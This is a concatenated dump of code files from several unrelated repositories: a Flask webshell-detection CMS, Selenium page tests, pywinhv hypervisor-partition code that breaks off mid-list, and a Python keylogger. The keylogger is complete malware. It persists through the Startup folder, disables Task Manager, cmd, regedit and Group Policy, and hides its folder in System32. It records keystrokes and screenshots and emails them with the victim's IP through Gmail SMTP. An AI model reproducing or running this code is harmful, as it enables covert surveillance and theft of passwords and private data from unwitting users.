'10401823702010c3150304ea02e802c0050006f0077006500720020004100' \
'64006d0069006e0020004c004c00430020005000410045007800650063a11' \
'c801a687474703a2f2f7777772e706f77657261646d696e2e636f6d20300d' \
'06092a864886f70d0101010500048201007f89049751a555829048d7409c7' \
'e03561dbc24a42c6846fb21d8688e7626ce1901e8cc8cf2b6367c6a420828' \
'<KEY>' \
'256b8b501387a02b777960feaef5262a85c120e472af35b93f2aeda47326f' \
'bb177b26bcc3a38f7c347c07576ef9a21131ae477cf3fc42f92d558309fdc' \
'8c560171473591b7db0a4c83db7d26ea7746cfed79bf720ba1d6bd2ce1793' \
'aded267d8c665abe834bfa9b17dc326e005cb3ed68d17eb70351025d45567' \
'd2c90ad1005572efce374ddf01d898672d71f941036c4af9c74475a5b1ce8' \
'ce529b0eb46dda41e93a9a8afe53148c065be8955efda466527eb3bddca18' \
'2020b3082020706092a864886f70d010906318201f8308201f40201013072' \
'305e310b3009060355040613025553311d301b060355040a131453796d616' \
'e74656320436f72706f726174696f6e3130302e0603550403132753796d61' \
'6e7465632054696d65205374616d70696e672053657276696365732043412' \
'02d20473202100ecff438c8febf356e04d86a981b1a50300906052b0e0302' \
'1a0500a05d301806092a864886f70d010903310b06092a864886f70d01070' \
'1301c06092a864886f70d010905310f170d3135303232353134333532325a' \
'302306092a864886f70d010904311604145455430ff01d5ea632e1e24ce7f' \
'<KEY>' \
'<KEY>' \
'bfdec99c62caef297e9665a0f5d4c398ebbeee14948298bee9372de956237' \
'6263c3b31e0173d428e91c307276dd57a30e5e13c9c49d7b6335a38a4c02d' \
'4d1cd9b18019e2d8bb08fa6b54882aa4b2e4040ed74e23feef64c8e9b843c' \
'af2f0fea60fdf2180604b8d51ddd50934e90766ffd0a7b9b1584e28c2bea8' \
'<KEY>' \
'<KEY>' \
'cce617fbf36732899810434ae54185141ce5495bff74e45baef3832cc5b1a' \
'fe0c65ad3200440000000000'
``` |
{
"source": "0v3rW4tch/webshell_detect_cms",
"score": 2
} |
#### File: webshell_detect_cms/apps/hooks.py
```python
from .views import bp
import config
from flask import session,g
from .models import CMSUser
@bp.before_request
def before_request():
if 'user_id' in session:
user_id = session.get('user_id')
user = CMSUser.query.get(user_id)
if user:
g.cms_user = user
```
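The hook above runs before every request on the blueprint and, when a session exists, attaches the logged-in `CMSUser` to Flask's per-request `g` object. A minimal sketch of how a view might consume it; the `profile` view, template name, and `login` endpoint are hypothetical, not part of this repo:
```python
from flask import g, render_template, redirect, url_for
from .views import bp

@bp.route('/profile/')
def profile():
    # g.cms_user was attached by the before_request hook above, if logged in.
    user = getattr(g, 'cms_user', None)
    if user is None:
        return redirect(url_for('login'))  # hypothetical endpoint
    return render_template('profile.html', user=user)
```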
#### File: 0v3rW4tch/webshell_detect_cms/cms_develop.py
```python
from flask import Flask
from apps import bp_app
import config
from exts import db,scheduler
from flask_wtf import CSRFProtect
from utils import detectcore
def create_app():
app = Flask(__name__)
app.register_blueprint(bp_app)
app.config.from_object(config)
db.init_app(app)
app.config.update(
{"SCHEDULER_API_ENABLED": True,
"JOBS": [{"id": "mission_1",
"func": "utils.detectcore:train_save_model",
"trigger": "interval",
"seconds": 3600*24
},{"id": "mission_2", # 任务ID
"func": "apps.views:del_upload_file", # 任务位置
"trigger": "interval", # 触发器
"seconds": 3600*11 # 时间间隔
},{"id": "mission_3", # 任务ID
"func": "utils.detectcore:do_cross_validate", # 任务位置
"trigger": "interval", # 触发器
"seconds": 3600*12 # 时间间隔
}
]},threaded=True
)
scheduler.init_app(app)
scheduler.start()
CSRFProtect(app)
return app
app = create_app()
if __name__ == '__main__':
app.run(host='0.0.0.0',threaded=True,port=8888)
```
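Each entry in the `JOBS` list is resolved by Flask-APScheduler from its "module:callable" import path and fired on the given interval trigger. A standalone sketch of the same config-driven pattern; the job function and the 10-second interval are illustrative only:
```python
from flask import Flask
from flask_apscheduler import APScheduler

app = Flask(__name__)
app.config['JOBS'] = [{
    'id': 'heartbeat',        # unique job ID
    'func': '__main__:tick',  # "module:callable" import path
    'trigger': 'interval',    # fire repeatedly at a fixed interval
    'seconds': 10,
}]

def tick():
    print('tick')

scheduler = APScheduler()
scheduler.init_app(app)  # reads JOBS from the app config
scheduler.start()
```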
#### File: 0v3rW4tch/webshell_detect_cms/manage.py
```python
from flask_script import Manager
from flask_migrate import Migrate,MigrateCommand
from cms_develop import create_app
from exts import db
from apps.models import CMSUser
app = create_app()
manager = Manager(app)
Migrate(app,db)
manager.add_command('db',MigrateCommand)
@manager.option('-u','--username',dest='username')
@manager.option('-p','--password',dest = 'password')
@manager.option('-e','--email',dest = 'email')
def create_cms_user(username,password,email):
user = CMSUser(username,password,email)
db.session.add(user)
db.session.commit()
print("用户增加成功")
if __name__ == '__main__':
manager.run()
``` |
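With Flask-Script, the `@manager.option` decorators above turn `create_cms_user` into a sub-command whose flags map to the function's arguments, alongside the registered `db` migration commands. Hypothetical invocations (credentials are placeholders):
```python
# python manage.py db init && python manage.py db migrate && python manage.py db upgrade
# python manage.py create_cms_user -u admin -p secret -e admin@example.com
```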
{
"source": "0ver3inker/Python-Keylogger",
"score": 2
} |
#### File: 0ver3inker/Python-Keylogger/Keylogger.py
```python
import sys
import os
from os.path import expanduser
# --------------------------------------------------------
# FOR THE CHECKUPS AND USING WINDOWS COMMANDS ON SHELL
from platform import system
import ctypes
import getpass
# --------------------------------------------------------
# GETTING THE PROCESS TIME
# import datetime, time  # unused; only sleep() is needed below
from time import sleep as s
# ---------------------------------------------------------
# GETTING USER'S IPV6 ADDRESS
import urllib.request
# ----------------------------------------------------------
# SENDING AN EMAIL
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import mimetypes
import email.mime.application
from email.mime.base import MIMEBase
from email import encoders
from email.mime.image import MIMEImage
# ---------------------------------------------------------
# KEYLOGGER LIBRARIES
import pynput
from pynput.keyboard import Key, Listener
import logging
# --------------------------------------------------------------
# THREADING
import threading
from threading import Thread
# --------------------------------------------------------------
# BACKDOOR LIBRARIES, CLIENT
import socket
import subprocess
# --------------------------------------------------------------
# TAKING SCREENSHOTS
import pyautogui
"""------------------------------------------------------- CHECKS -----------------------------------------------------------------"""
# ADD TO STARTUP
USER_NAME = getpass.getuser()
def AddToRegistry(file_path=""):
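    # Despite its name, this function persists via a Skype.bat file dropped in
    # the user's Startup folder rather than via a registry Run key.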
if file_path == "":
file_path = os.path.dirname(os.path.realpath(__file__))
    bat_path = (
        r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        % USER_NAME
    )
with open(bat_path + "\\" + "Skype.bat", "w+") as bat_file:
bat_file.write(r'start "" %s' % file_path)
# ---------------------
class disablecheck:
# DISABLE TASK MANAGER
def task(self):
os.system(
"REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
)
# DISABLE CMD
def cmd(self):
os.system(
"REG add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f"
)
# DISABLE REGEDIT
def regedit(self):
os.system(
'REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0'
)
# DISABLE GROUP POLICY
def grouppolicy(self):
os.system(
'REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f'
)
"""------------------------------------------------------- EXPLOITS -----------------------------------------------------------------"""
general_path = expanduser("~")
# TAKE SCREENSHOTS
def takescreenshot(screenshotpath):
screenshot_index = 0
while 1:
myScreenshot = pyautogui.screenshot()
myScreenshot.save(f"{screenshotpath}/{screenshot_index}.png")
screenshot_index += 1
s(5)
# --------------------
# GET IPV6 ADDRESS
def getip():
external_ip = urllib.request.urlopen("https://ident.me").read().decode("utf8")
return external_ip
# --------------------
# KEYLOGGER
class keylogger(Thread):
    def __init__(self, path):
        super().__init__()  # initialize the Thread base class
        self.path = path
        self.keylog_index = 1
        self.Keys = []
def on_press(self, key):
self.KEY = pynput.keyboard.Key # --> Getting keys
if key == self.KEY.backspace:
self.Keys.append(" [Back] ")
elif key == self.KEY.tab:
self.Keys.append(" [Tab] ")
elif key == self.KEY.enter:
self.Keys.append(" [Enter] ")
elif key == self.KEY.space:
self.Keys.append(" [Space] ")
elif (
type(key) == self.KEY
): # if the character is some other type of special key #--> Checking keys here
self.Keys.append(" [" + str(key)[4:] + "] ")
else:
self.Keys.append(key)
def savefile():
file_location = self.path + f"/keylog{self.keylog_index}.txt"
with open(file_location, "w", encoding="utf-8") as f: # --> Saving Keys
for i in self.Keys:
f.write(str(i))
# DETERMINE WHEN YOU WANT THE KEYS TO SAVE TO A FILE
if len(self.Keys) >= 20:
savefile()
self.keylog_index += 1
self.Keys.clear()
def logger(self):
file_location = self.path + f"/keylog{self.keylog_index}.txt"
logging.basicConfig(
filename=(file_location), level=logging.DEBUG, format="%(message)s")
with Listener(on_press=self.on_press) as listener:
listener.join()
with open(file_location, "w", encoding="utf-8") as f:
for i in self.Keys:
f.write(str(i))
def run(self):
self.t1 = threading.Thread(target=self.logger, args=())
self.t1.start()
# --------------------
# SENDING AN EMAIL
class Email:
get_ip = getip()
def __init__(self, path):
self.email = ""
self.password = ""
self.path = path
self.msg = MIMEMultipart()
self.subject = self.msg["Subject"] = self.get_ip
self.msg["From"] = ""
self.msg["To"] = ""
self.body = ""
def addattachment(self):
for files in os.listdir(self.path):
if files.lower().endswith("txt"):
self.msg.attach(MIMEText(self.body, "plain", "utf-8"))
filename = files
attachment = open(f"{self.path}\\{files}", "rb")
p = MIMEBase("application", "octet-stream")
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header(
"Content-Disposition", "attachment; filename= %s" % filename
)
self.msg.attach(p)
attachment.close()
elif (files.lower().endswith("png")):
fp = open(f"{self.path}\\{files}", 'rb')
img = MIMEImage(fp.read(), _subtype="png")
fp.close()
img.add_header("Content-ID", "attachment; filename= %s" % files)
self.msg.attach(img)
else:
print("Cannot find the extension!")
def send(self):
s = smtplib.SMTP("smtp.gmail.com", 587)
s.starttls()
s.login(self.email, self.password)
s.sendmail(self.email, self.email, self.msg.as_string())
s.quit()
def run(self):
t1 = threading.Thread(target=self.addattachment)
t2 = threading.Thread(target=self.send)
t1.start()
t1.join()
t2.start()
"""------------------------------------------------------- RUNNING -----------------------------------------------------------------"""
# GET THE SYSTEM NAME
def getsystem():
return system()
# MAKE IT INFALLIBLE: ONLY RUN ON WINDOWS
if getsystem().lower() == "windows":
# DIRECTORIES
desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')
system32_path = os.path.join(os.path.join(str(os.path.expanduser("~"))[0:3], "Windows\\System32"))
try:
exploit_path = os.mkdir(os.path.join(str(system32_path), "\\VHVybkJhY2tOb3c="))
except:
pass
exploit_path = expanduser(system32_path + "\\VHVybkJhY2tOb3c=")
ctypes.windll.kernel32.SetFileAttributesW(exploit_path, 2) # HIDING OUR DIRECTORY
# ADDING TO STARTUP
AddToRegistry()
# DISABLING REGEDIT, TASK MANAGER, GROUP POLICY AND CMD
disable = disablecheck()
disable.cmd()
disable.grouppolicy()
disable.regedit()
disable.task()
logger = keylogger(exploit_path) # KEYLOGGER OBJECT
mail = Email(exploit_path) # EMAIL OBJECT
logger.run()
threading.Thread(target=takescreenshot, args=(exploit_path,)).start()
def sendemail():
while True:
check = os.listdir(exploit_path)
count = 0
for keylogs in check:
if keylogs.startswith("keylog"):
count += 1
else:
continue
if count >= 5:
mail.run()
for check in os.listdir(exploit_path):
try:
os.remove(f"{exploit_path}\\{check}")
s(0.1)
except:
continue
else:
continue
s(5)
threading.Thread(target = sendemail).start()
``` |
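The `Email` class above assembles a multipart message and base64-encodes each attachment before sending it over SMTP with STARTTLS. A minimal, standalone sketch of that attachment pattern using only the standard library; the addresses and file name are placeholders:
```python
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

msg = MIMEMultipart()
msg['Subject'] = 'report'
msg['From'] = 'sender@example.com'    # placeholder
msg['To'] = 'recipient@example.com'   # placeholder

with open('report.txt', 'rb') as f:   # placeholder file
    part = MIMEBase('application', 'octet-stream')
    part.set_payload(f.read())
encoders.encode_base64(part)          # base64-encode the binary payload
part.add_header('Content-Disposition', 'attachment; filename=report.txt')
msg.attach(part)
```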
{
"source": "0verchenko/learning",
"score": 3
} |
#### File: 0verchenko/learning/test_items.py
```python
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_add_to_cart_button_is_displayed(browser):
browser.get(LINK)
add_to_cart_button = WebDriverWait(browser, 5).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, 'form#add_to_basket_form>button')))
assert add_to_cart_button.is_displayed()
``` |
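`WebDriverWait(...).until(...)` polls the expected-condition predicate until it returns something truthy or the timeout expires, which makes the assertion robust against late-rendering elements. A sketch of the same pattern with a different condition; the test name is hypothetical and the locator reuses the one from the test above:
```python
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"

def test_add_to_cart_button_is_clickable(browser):
    # element_to_be_clickable waits for visibility *and* an enabled state.
    browser.get(LINK)
    button = WebDriverWait(browser, 5).until(
        EC.element_to_be_clickable((By.CSS_SELECTOR, 'form#add_to_basket_form>button')))
    button.click()
```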
{
"source": "0verchenko/PageObject",
"score": 3
} |
#### File: PageObject/pages/login_page.py
```python
from .base_page import BasePage
from .locators import LoginPageLocators
class LoginPage(BasePage):
def should_be_login_page(self):
self.should_be_login_url()
self.should_be_login_form()
self.should_be_register_form()
def should_be_login_url(self):
assert "login" in self.browser.current_url
def should_be_login_form(self):
login_form = self.browser.find_element(*LoginPageLocators.LOGIN_FORM)
assert login_form.is_displayed()
def should_be_register_form(self):
register_form = self.browser.find_element(*LoginPageLocators.REGISTER_FORM)
assert register_form.is_displayed()
``` |
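A hypothetical test exercising the page object above; it assumes the common `BasePage(browser, url)` constructor and `open()` helper that projects of this shape define in `base_page.py`:
```python
from pages.login_page import LoginPage

def test_login_page_is_well_formed(browser):
    page = LoginPage(browser, "http://selenium1py.pythonanywhere.com/accounts/login/")
    page.open()
    page.should_be_login_page()
```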
{
"source": "0vercl0k/pywinhv",
"score": 3
} |
#### File: pywinhv/pywinhv/partition.py
```python
import winhvplatform as hvplat
import pywinhv as whv
import vp
import utils
import ctypes as ct
import sys
from ctypes import c_size_t as SIZE_T
from ctypes.wintypes import BOOL, LPVOID, DWORD
from collections import namedtuple
ct.windll.kernel32.VirtualAlloc.argtypes = (LPVOID, SIZE_T, DWORD, DWORD)
ct.windll.kernel32.VirtualAlloc.restype = LPVOID
VirtualAlloc = ct.windll.kernel32.VirtualAlloc
ct.windll.kernel32.VirtualFree.argtypes = (LPVOID, SIZE_T, DWORD)
ct.windll.kernel32.VirtualFree.restype = BOOL
VirtualFree = ct.windll.kernel32.VirtualFree
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_RELEASE = 0x00008000
PAGE_READWRITE = 0x04
TranslationTableEntry_t = namedtuple(
'TranslationTableEntry_t', (
'Gva', 'Hva', 'Flags'
)
)
class WHvPartition(object):
    '''This is the Python abstraction for a Partition. The class
    can also be used as a context manager. A lot of effort goes into hiding
    the underlying details of the WinHvPlatform APIs, and into making the
    raw APIs (exposed by SWIG) more pythonic to invoke.
    As there are several different addresses describing the same memory, the
    following convention is used:
    * The Partition object represents a 'guest',
* The process from which you are instantiating the Partition is the 'host',
* As a result - there are always three different addresses describing the same
piece of memory:
* The address in the host virtual address-space is an HVA,
* The address in the guest virtual address-space is a GVA,
* The address in the guest physical address-space is a GPA.
'''
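    # Illustration (hypothetical numbers): a page mapped at Gpa 0x1000 may be
    # backed by host memory at Hva 0x1f0000, while the guest's page tables
    # expose it at Gva 0x7fff0000; three names for the same bytes.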
def __init__(self, **kwargs):
'''Create and setup a Partition object.'''
        assert utils.IsHypervisorPresent(), 'The hypervisor platform API support must be turned on.'
self.ProcessorCount = kwargs.get('ProcessorCount', 1)
self.Name = kwargs.get('Name', 'DefaultName')
self.ExceptionExitBitmap = kwargs.get('ExceptionExitBitmap', 0)
# XXX: OrderedDict might be better?
self.TranslationTable = {}
self.Processors = []
# Create the partition.
Success, Handle, Ret = hvplat.WHvCreatePartition()
assert Success, 'WHvCreatePartition failed in context manager with %x.' % Ret
self.Handle = Handle
# Set-up the partition with a number of VPs.
Property = whv.WHV_PARTITION_PROPERTY()
Property.ProcessorCount = self.ProcessorCount
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeProcessorCount,
Property
)
assert Success, 'WHvSetPartitionProperty(ProcessorCount) failed in context manager with %x.' % Ret
# Set-up Exception exits.
Property.ExtendedVmExits.ExceptionExit = 1
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeExtendedVmExits,
Property
)
assert Success, 'WHvSetPartitionProperty(ExtendedVmExits) failed in context manager with %x.' % Ret
# Set-up the ExceptionExitBitmap.
Property.ExceptionExitBitmap = 1 << whv.WHvX64ExceptionTypeBreakpointTrap
Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypePageFault
Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypeGeneralProtectionFault
Success, Ret = hvplat.WHvSetPartitionProperty(
self.Handle,
whv.WHvPartitionPropertyCodeExceptionExitBitmap,
Property
)
assert Success, 'WHvSetPartitionProperty(ExceptionExitBitmap) failed in context manager with %x.' % Ret
# Activate the partition.
Success, Ret = hvplat.WHvSetupPartition(self.Handle)
assert Success, 'WHvSetupPartition failed in context manager with %x.' % Ret
# Create the virtual processors.
for VpIndex in range(self.ProcessorCount):
Success, Ret = hvplat.WHvCreateVirtualProcessor(
self.Handle,
VpIndex
)
assert Success, 'WHvCreateVirtualProcessor(%d) failed in context manager with %x.' % (VpIndex, Ret)
Vp = vp.WHvVirtualProcessor(
self.Handle,
self,
VpIndex
)
self.Processors.append(Vp)
@classmethod
def CreateDefault(cls, Name = 'default'):
'''Create a default partition with a single VP.'''
Partition = cls(
ProcessorCount = 1,
Name = Name,
)
return Partition
def __enter__(self):
return self
def __exit__(self, etype, value, traceback):
BlockHasThrown = etype is not None
# Release the VPs.
for Vp in self.Processors:
Success, Ret = hvplat.WHvDeleteVirtualProcessor(
self.Handle,
Vp.Index
)
assert Success, 'WHvDeleteVirtualProcessor failed in context manager with %x.' % Ret
# Release the Partition.
Success, Ret = hvplat.WHvDeletePartition(self.Handle)
assert Success, 'WHvDeletePartition failed in context manager with %x.' % Ret
# XXX: Release memory
self.TranslationTable = {}
# Forward the exception is we've intercepted one, otherwise s'all good.
return not BlockHasThrown
def __repr__(self):
        '''Pretty-printer for the Partition object.'''
return 'Partition(%r, ProcessorCount=%d)' % (
self.Name,
self.ProcessorCount
)
def GetVp(self, Index):
'''Get a VP instance.'''
assert Index < self.ProcessorCount
return self.Processors[Index]
def MapGpaRangeWithoutContent(self, Gpa, SizeInBytes, Flags):
'''Map a GPA range in the partition. This takes care of allocating
memory in the host and mapping it in the guest.'''
SizeInBytes = utils.Align2Page(SizeInBytes)
Hva = VirtualAlloc(
0,
SizeInBytes,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE
)
assert Hva is not None, 'VirtualAlloc failed.'
if 'd' not in Flags:
# Force the 'd' dirty flag that is used for save/restore.
Flags += 'd'
WHvFlags = whv.WHvMapGpaRangeFlagNone
if 'r' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagRead
if 'w' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagWrite
if 'x' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagExecute
if 'd' in Flags:
WHvFlags |= whv.WHvMapGpaRangeFlagTrackDirtyPages
Success, Ret = hvplat.WHvMapGpaRange(
self.Handle,
Hva,
Gpa,
SizeInBytes,
WHvFlags
)
assert Success, 'WHvMapGpaRange failed with: %s.' % hvplat.WHvReturn(Ret)
# Break the range into a series of pages for the translation table.
for Idx in range(SizeInBytes / 0x1000):
CurGpa = Gpa + (Idx * 0x1000)
CurHva = Hva + (Idx * 0x1000)
self.TranslationTable[CurGpa] = TranslationTableEntry_t(
CurGpa, CurHva, Flags
)
return (Hva, Gpa, SizeInBytes)
def MapGpaRange(self, Gpa, Buffer, Flags):
'''Map a GPA range in the partition and initialize it with content.'''
Hva, _, SizeInBytes = self.MapGpaRangeWithoutContent(
Gpa,
len(Buffer),
Flags
)
ct.memmove(Hva, Buffer, len(Buffer))
return (Hva, SizeInBytes)
def MapCode(self, Code, Gpa, Writeable = False):
'''Map a GPA range used to host code in the partition.'''
Flags = 'rx'
if Writeable:
Flags += 'w'
Hva, CodeLength = self.MapGpaRange(
Gpa,
Code,
Flags
)
return (Hva, CodeLength)
def UnmapGpaRange(self, Gpa, SizeInBytes, Hva = None):
'''Unmap a GPA range and release the backing host memory page if provided.'''
hvplat.WHvUnmapGpaRange(
self.Handle,
Gpa,
SizeInBytes
)
if Hva is None:
return
Success = VirtualFree(
Hva,
0,
0x8000  # MEM_RELEASE requires dwSize 0; VirtualFree returns non-zero on success.
) != 0
assert Success, 'VirtualFree failed.'
def TranslateGpa(self, Gpa):
'''Translate a GPA to an HVA. This is only possible because we
keep track of every call made to map GPA ranges and store the HVA/GPA.'''
GpaAligned, Offset = utils.SplitAddress(Gpa)
Entry = self.TranslationTable.get(GpaAligned, None)
if Entry is not None:
return Entry.Hva + Offset
return None
def GetPartitionCounters(self, Counter):
'''Get a partition performance counter.'''
Success, Counters, Ret = hvplat.WHvGetPartitionCounters(
self.Handle,
Counter
)
assert Success, 'WHvGetPartitionCounters failed with: %s.' % hvplat.WHvReturn(Ret)
return Counters
def QueryGpaRangeDirtyBitmap(self, Gpa, RangeSize):
'''Get a list of bits describing which physical guest page is dirty. One bit per
page.'''
Success, Bits, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap(
self.Handle,
Gpa,
RangeSize
)
assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret)
return Bits
def ClearGpaRangeDirtyPages(self, Gpa, RangeSize):
'''Clear the dirty bits on a GPA range.'''
Success, _, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap(
self.Handle,
Gpa,
RangeSize,
True
)
assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret)
def ClearGpaDirtyPage(self, Gpa):
'''Clear the dirty bit for a specific GPA page.'''
return self.ClearGpaRangeDirtyPages(
Gpa,
0x1000
)
def QueryGpaRangeDirtyPages(self, Gpa, RangeSize):
'''Get a list of the dirty GPAs.'''
Bits = self.QueryGpaRangeDirtyBitmap(
Gpa,
RangeSize
)
DirtyPages = []
CurGpa = Gpa
for Bit in Bits:
if Bit:
DirtyPages.append(CurGpa)
CurGpa += 0x1000
return DirtyPages
def IsGpaDirty(self, Gpa):
'''Is the GPA page dirty or not?'''
return self.QueryGpaRangeDirtyBitmap(
Gpa,
0x1000
)[0]
def Save(self):
'''Save a snapshot of the virtual processors registers as well as the physical
memory space. It can be restored with Restore.'''
Snapshot = {
'VP' : [],
'Mem' : {},
'Table' : self.GetTranslationTable()
}
# XXX: SpecCtrl & cie, ensure they are available in the VP.
for Vp in self.Processors:
Registers = Vp.GetRegisters(hvplat.AllRegisters)
Snapshot['VP'].append((
Vp.Index,
Registers
))
for Gpa, Entry in self.TranslationTable.iteritems():
# Don't save pages that are not writeable.
if 'w' not in Entry.Flags:
continue
PageContent = ct.string_at(Entry.Hva, 0x1000)
Snapshot['Mem'][Gpa] = (
Entry.Hva, PageContent
)
self.ClearGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
return Snapshot
def Restore(self, Snapshot):
'''Restore a snapshot into the partition.'''
for VpIndex, Registers in Snapshot['VP']:
Vp = self.GetVp(VpIndex)
Vp.SetRegisters(
# XXX: Something cleaner maybe?
dict(zip(hvplat.AllRegisters, Registers))
)
# Force a copy of the table.
self.TranslationTable = dict(Snapshot['Table'])
if False:
# XXX: It seems to be slower..?
DirtyGpas = self.QueryGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
# Restore the dirty memory that has been saved off.
for DirtyGpa in DirtyGpas:
Hva, PageContent = Snapshot['Mem'].get(DirtyGpa)
ct.memmove(Hva, PageContent, 0x1000)
else:
# Restore the dirty memory that has been saved off.
for Hva, PageContent in Snapshot['Mem'].itervalues():
ct.memmove(Hva, PageContent, 0x1000)
self.ClearGpaRangeDirtyPages(
0,
# XXX: This assumes that the physical address space is packed and that
# there is no hole.
len(self.TranslationTable) * 0x1000
)
def GetTranslationTable(self):
'''Return a copy of the translation table.'''
return dict(self.TranslationTable)
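# Illustrative usage (a sketch, not from the original source; the 'demo' label
# and addresses are hypothetical, the class name follows the test-suite usage):
#   with WHvPartition.CreateDefault('demo') as Partition:
#       Hva, Gpa, SizeInBytes = Partition.MapGpaRangeWithoutContent(0x0, 0x1000, 'rw')
#       Vp = Partition.GetVp(0)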
def main(argc, argv):
return 0
if __name__ == '__main__':
sys.exit(main(len(sys.argv), sys.argv))
```
#### File: 0vercl0k/pywinhv/test64.py
```python
import pywinhv as hv
import sys
import struct
import unittest
import ctypes as ct
# mov rax, Address ; mov rbx, Value ; mov [rax], rbx
WriteMemory64 = lambda Address, Value: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\xbb' + struct.pack('<Q', Value) + '\x48\x89\x18'
# mov rax, Address ; mov rax, [rax]
ReadMemory64 = lambda Address: '\x48\xb8' + struct.pack('<Q', Address) + '\x48\x8b\x00'
# mov rax, gs:[0]
LoadGsInRax = '\x65\x48\x8b\x04\x25\x00\x00\x00\x00'
# inc rax
IncRax = '\x48\xff\xc0'
# int3
Int3 = '\xcc'
class PackedPhysicalMemory(object):
'''The goal of this class is to provide a very simple GPA allocation policy.
It basically packs up the physical space page by page.'''
def __init__(self, BaseGpa = 0):
self.Gpa = 0
def GetGpa(self, Pages = 1):
'''Get the next available GPA address.'''
Gpa = self.Gpa
self.Gpa += (0x1000 * Pages)
return Gpa
def CreatePartition(Pages, PackedSpacePolicy, TebGva):
'''Create a partition and configure it like a Windows 64bit environment.'''
Partition = hv.WHvPartition.CreateDefault('64b user')
Vp = Partition.GetVp(0)
# Let's enable long mode now...
# https://wiki.osdev.org/Setting_Up_Long_Mode.
# We basically need several things (cf https://wiki.osdev.org/X86-64):
# * Set the PAE enable bit in CR4
# * Load CR3 with the physical address of the PML4
# * Enable long mode by setting the EFER.LME flag in MSR 0xC0000080
# * Enable paging
# OK so we need to allocate memory for paging structures, and build the
# virtual address space.
Pml4Gpa = hv.BuildVirtualAddressSpace(
Partition,
Pages,
PackedSpacePolicy
)
# Turn on CR4.PAE.
# kd> r @cr4
# cr4=0000000000170678
# 0b100110000011000100000
# 'Physical Address Extension', 'Operating system support for FXSAVE and FXRSTOR instructions',
# 'Operating System Support for Unmasked SIMD Floating-Point Exceptions',
# 'Enables the instructions RDFSBASE, RDGSBASE, WRFSBASE, and WRGSBASE',
# 'PCID Enable', 'Supervisor Mode Execution Protection Enable'.
Cr4 = 0x000000000170678
# We need to update CR3 to point to the PML4's physical address.
Cr3 = Pml4Gpa
# Turn on EFER.LME.
# kd> rdmsr 0xC0000080
# msr[c0000080] = 00000000`00000d01
# 0b0000110100000001
# 'System Call Extensions', 'Long Mode Enable', 'Long Mode Active', 'No-Execute Enable'.
Efer = 0xD01
# Turn on CR0.PG.
# kd> r @cr0
# Last set context:
# cr0=0000000080050031
# 'Protected Mode Enable', 'Extension type', 'Numeric Error', 'Write Protect',
# 'Alignment mask', 'Paging'.
Cr0 = 0x80050031
Vp.SetRegisters({
hv.Cr0 : Cr0,
hv.Cr3 : Cr3,
hv.Cr4 : Cr4,
hv.Efer : Efer,
})
print 'Enabled 64-bit long mode'
# We should be good to set-up 64-bit user-mode segments now.
# 0:000> r @cs
# cs=0033
Cs = hv.Generate64bUserCodeSegment()
# 0:001> r @ss
# ss=002b
DataSegment = hv.Generate64bUserDataSegment()
# 0:001> r @fs
# fs=0053
TebSegment = hv.Generate64bUserDataSegment(TebGva)
Vp.SetRegisters({
hv.Cs : Cs,
hv.Ss : DataSegment,
hv.Ds : DataSegment,
hv.Es : DataSegment,
hv.Fs : DataSegment,
hv.Gs : TebSegment,
#_Rdx : 0, XXX Figure out where the 806e9 is coming from.
})
print 'Partition created:', Partition
return Partition
# https://wiki.osdev.org/Exceptions#Page_Fault
PF_ERRCODE_PRESENT = 1 << 0
PF_ERRCODE_WRITE = 1 << 1
PF_ERRCODE_USER = 1 << 2
PF_ERRCODE_RESERVED_WRITE = 1 << 3
PF_ERRCODE_IFETCH = 1 << 4
class FeatureTests(unittest.TestCase):
'''Test everything related to features.'''
@classmethod
def setUpClass(cls):
'''This method is called once and initialize a partition object with a bunch
of pages mapped in already.'''
cls.TebGva = 0x000008b307ae000
cls.CodeGva = 0x00007fffb8c05000
cls.ReadOnlyGva = 0x00007fffb8c06000
cls.ReadWriteGva = 0x00007fffb8c07000
cls.ReadWriteExecuteGva = 0x00007fffb8c08000
cls.KernelPageGva = 0xfffff80178e05000
cls.Page0Gva = 0x0007ff60cf10000
cls.Page1Gva = 0x0007ff60cf11000
cls.Pages = [
(cls.TebGva, 'rw'),
